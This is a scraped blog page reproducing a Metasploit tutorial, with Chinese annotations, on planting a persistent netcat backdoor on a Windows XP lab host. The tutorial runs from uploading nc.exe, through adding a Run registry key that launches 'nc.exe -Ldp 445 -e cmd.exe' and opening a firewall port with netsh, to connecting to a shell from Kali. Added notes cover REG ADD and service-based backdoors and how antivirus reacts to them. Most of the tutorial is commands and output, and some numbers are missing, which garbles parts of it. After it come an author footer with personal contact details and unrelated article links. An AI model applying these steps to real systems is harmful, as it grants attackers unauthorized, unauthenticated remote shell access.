In this example, instead of looking up information on the remote system, we will be installing a netcat backdoor. This includes changes to the system registry and firewall.

First, we must upload a copy of netcat to the remote system.

meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32

[*] uploading  : /tmp/nc.exe -> C:\windows\system32

[*] uploaded   : /tmp/nc.exe -> C:\windows\system32nc.exe

  Afterwards, we work with the registry to have netcat execute on start up and listen on port 445. We do this by editing the key ‘HKLM\software\microsoft\windows\currentversion\run’.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values ():

    VMware Tools

    VMware User Process

    quicktftpserver

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'

Successful set nc.

meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

Key: HKLM\software\microsoft\windows\currentversion\Run

Name: nc

Type: REG_SZ

Data: C:\windows\system32\nc.exe -Ldp  -e cmd.exe

  使用命令行自带的reg命令也行, 前提是系统杀毒软件不出提示:

REG ADD HKLM\software\microsoft\windows\currentversion\run /v nc /t REG_SZ /d "c:\xxx.exe"

  Next, we need to alter the system to allow remote connections through the firewall to our netcat backdoor. We open up an interactive command prompt and use the ‘netsh’ command to make the changes as it is far less error prone than altering the registry directly. Plus, the process shown should work across more versions of Windows, as registry locations and functions are highly version and patch level dependent.

meterpreter > execute -f cmd -i

Process  created.

Channel  created.

Microsoft Windows XP [Version 5.1.]

(C) Copyright - Microsoft Corp.

C:\Documents and Settings\Jim\My Documents > netsh firewall show opmode

Netsh firewall show opmode

Domain profile configuration:

-------------------------------------------------------------------

Operational mode                  = Enable

Exception mode                    = Enable

Standard profile configuration (current):

-------------------------------------------------------------------

Operational mode                  = Enable

Exception mode                    = Enable

Local Area Connection firewall configuration:

-------------------------------------------------------------------

Operational mode                  = Enable

  We open up port 445 in the firewall and double-check that it was set properly.

C:\Documents and Settings\Jim\My Documents > netsh firewall add portopening TCP  "Service Firewall" ENABLE ALL

netsh firewall add portopening TCP  "Service Firewall" ENABLE ALL

Ok.

C:\Documents and Settings\Jim\My Documents > netsh firewall show portopening

netsh firewall show portopening

Port configuration for Domain profile:

Port   Protocol  Mode     Name

-------------------------------------------------------------------

    TCP       Enable   NetBIOS Session Service

    TCP       Enable   SMB over TCP

    UDP       Enable   NetBIOS Name Service

    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:

Port   Protocol  Mode     Name

-------------------------------------------------------------------

    TCP       Enable   Service Firewall

    TCP       Enable   NetBIOS Session Service

    TCP       Enable   SMB over TCP

    UDP       Enable   NetBIOS Name Service

    UDP       Enable   NetBIOS Datagram Service

C:\Documents and Settings\Jim\My Documents >

  So with that being completed, we will reboot the remote system and test out the netcat shell.

root@kali:~# nc -v 172.16.104.128

172.16.104.128: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [172.16.104.128]  (?) open

Microsoft Windows XP [Version 5.1.]

(C) Copyright - Microsoft Corp.

C:\Documents and Settings\Jim > dir

dir

Volume in drive C has no label.

Volume Serial Number is E423-E726

Directory of C:\Documents and Settings\Jim

// : AM

.

// : AM

..

// : AM  ;i

// : PM

Desktop

// : PM

Favorites

// : PM

My Documents

// : AM  QCY

// : AM

Start Menu

// : AM  talltelnet.log

// : AM  talltftp.log

 File(s)  bytes

 Dir(s) ,,, bytes free

C:\Documents and Settings\Jim >

  Wonderful! In a real world situation, we would not be using such a simple backdoor as this, with no authentication or encryption, however the principles of this process remain the same for other changes to the system, and other sorts of programs one might want to execute on start up.

  .使用sc创建自定义服务,留下后门, 但是有个问题是360还是会提示, 防止注册表被写入

作者: NONO
出处:http://www.cnblogs.com/diligenceday/

企业网站:http://www.idrwl.com/
开源博客:http://sqqihao.github.io/
QQ:287101329

微信:18101055830

Persistent Netcat Backdoor的更多相关文章

  1. Microsoft Windows .Reg File Dialog Box Message Spoofing 0day

    Microsoft Windows .Reg文件对话框消息欺骗 0day 概述 扩展名为.reg的文件是Windows注册表中使用的注册文件.这些文件可以包含hives.密钥和值..reg文件可以在文 ...

  2. Persistent Data Structures

    原文链接:http://www.codeproject.com/Articles/9680/Persistent-Data-Structures Introduction When you hear ...

  3. CodeForces #368 div2 D Persistent Bookcase DFS

    题目链接:D Persistent Bookcase 题意:有一个n*m的书架,开始是空的,现在有k种操作: 1 x y 这个位置如果没书,放书. 2 x y 这个位置如果有书,拿走. 3 x 反转这 ...

  4. coreData部分报错:This NSPersistentStoreCoordinator has no persistent stores.

    最近在修改一个程序BUG的时候遇到一个问题coreData部分报错:This NSPersistentStoreCoordinator has no persistent stores. 但实际跑程序 ...

  5. Exception loading sessions from persistent storage

    严重: Exception loading sessions from persistent storage java.io.EOFException 删除Tomcat里面的work/Catalina ...

  6. 【Codeforces-707D】Persistent Bookcase DFS + 线段树

    D. Persistent Bookcase Recently in school Alina has learned what are the persistent data structures: ...

  7. netcat命令

    1 简介 netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据.通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它.使用netcat命令所能完成的事情令人惊讶. netc ...

  8. nc 局域网聊天+文件传输(netcat)

    nc 局域网聊天+文件传输 nc的全程是netcat,这个工具非常好用. 有时候我们需要在局域网内传送一些文本消息或者文件的时候,通常的做法是安装一些局域网通讯软件,然后来做.其实不必要这样,使用nc ...

  9. POJ - 3652 Persistent Bits

    “模拟”类型,题型容易,使用bitset库对二进制逐位操作,初始化.十进制转二进制(unsigned int).位操作. POJ - 3652 Persistent Bits Time Limit:  ...

随机推荐

  1. Windows Phone本地数据库(SQLCE):8、DataContext(翻译)

    这是“windows phone mango本地数据库(sqlce)”系列短片文章的第八篇. 为了让你开始在Windows Phone Mango中使用数据库,这一系列短片文章将覆盖所有你需要知道的知 ...

  2. TStream实现多表查询

    TStream实现多表查询 function TynFiredac.QuerySQLS(const ASQL, ASQL2: string; AStorageFormat: string = 'bin ...

  3. Unity动画知识之二:Animator动画状态机

    上次我们讲过Unity游戏动画从入门到住院,今天我们来讲一下动画状态机. 好了,现在我们已经成功的导入了动画.接下来要玩的东西就很装13啦.因为大部分动画师是用不到这家伙的,需要掌握这个技能的,至少也 ...

  4. 如何在Windows下运行linux shell脚本

    在工作中情况会在碰到linux下进行执行shell的脚本,而就会使用shell的脚本,但经常使用的Windows的系统,而想在Windows电脑中进行直接shell的脚本,而不用再进行学习其它的脚本语 ...

  5. spring-boot:run启动时,指定spring.profiles.active

    Maven启动指定Profile通过-P,如mvn spring-boot:run -Ptest,但这是Maven的Profile. 如果要指定spring-boot的spring.profiles. ...

  6. 我们的生活第二季/全集This Is Us迅雷下载

    NBC剧集<我们这一天>宣布一次性续订2.3季,这部Dan Fogelman打造的大热剧是这个秋季档收视人数第二的广播网剧情剧.新续订的两季还是每季18集. NBC的叫好叫座剧<我们 ...

  7. 如何用 Java 实现 Web 应用中的定时任务?

    定时任务,是指定一个未来的时间范围执行一定任务的功能.在当前WEB应用中,多数应用都具备任务调度功能,针对不同的语音,不同的操作系统, 都有其自己的语法及解决方案,windows操作系统把它叫做任务计 ...

  8. 深入理解java虚拟机(六)字节码指令简介

    Java虚拟机指令是由(占用一个字节长度.代表某种特定操作含义的数字)操作码Opcode,以及跟随在其后的零至多个代表此操作所需参数的称为操作数 Operands 构成的.由于Java虚拟机是面向操作 ...

  9. FastJson、Jackson、Gson进行Java对象转换Json的细节处理

    前言 Java对象在转json的时候,如果对象里面有属性值为null的话,那么在json序列化的时候要不要序列出来呢?对比以下json转换方式 一.fastJson 1.fastJson在转换java ...

  10. [转]linux最新分区方案

    FROM : http://www.cnblogs.com/chenlulouis/archive/2009/08/27/1554983.html 我的服务器是500G.最重要的是/var分区一定要大 ...